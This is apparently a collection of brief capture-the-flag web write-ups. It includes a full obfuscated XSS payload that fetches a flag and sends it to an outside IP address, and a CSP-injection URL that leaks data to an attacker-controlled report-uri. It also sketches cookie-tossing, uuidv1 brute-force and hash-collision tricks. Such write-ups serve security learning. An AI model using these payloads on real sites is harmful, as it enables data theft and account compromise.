tl;dr

• We can join the two lines either by adding a ` or starting a comment /* at the end of one line and closing it *\ at the start of the next line
• We have to split the payload into 20 parts like that

Final payload

<img src='
'onerror='`
`;n=fetch;`
`;l=r=>{`
`;return/*
*/r.text();`
`;};`
`;p=q=>{s=/*
*/`http:`;`
`;s+=`//3`;`
`;s+=`4.9`;`
`;s+=`3.5`;`
`;window./*
*/location/*
*/=s+`6.144?
`+q;};`
`;f=`flag`;`
`;w=n(f)/*
*/.then(l)/*
*/.then(p);'

tl;dr

• Find the flag server qu-flag.lac.tf
• send a request to https://qu-flag.lac.tf with the uuid as an array and its first element as {uuid}/bypass#
• Visit the server with that uuid as a cookie

tl;dr

• It uses uuidv1 which is time-based
• We get the user uid from the cookie
• Then create an admin and get all the current admin hashes as an array from the web page
• Create another user
• Brutefoce the first eight bytes of the uuid in the range and check with each hash in the array
• Use the one that matches

tl;dr

• Use img src to inject csp
• Use report-uri your-domain to get csp violation reports
• Use require-trusted-types-for 'script' to get violation when innerHTML is set
• Use code=&code<payload> to make code undefined in front end

Final Payload: https://codebox.mc.ax/?code=&code=<img+src="*;+require-trusted-types-for+'script'+;+report-uri+https://your.domain.com/"+>

tl;dr

• Java mishandles the cookies such that when there is a cookie with a ", it will take all the cookies until there is a " as that cookie’s value
• We can set empty cookies using javascript document.cookie="=value";
• Use that to set a new note cookie by adding note in the value document.cookie='=note="';
• Make our cookie first by giving path as // as chrome sends cookies with longer paths first
• Now create an iframe with // as src and read its innerHTML

tl;dr

• Craft a payload with a random nonce
• Use something like hash-collider to collide the nonce we gave earlier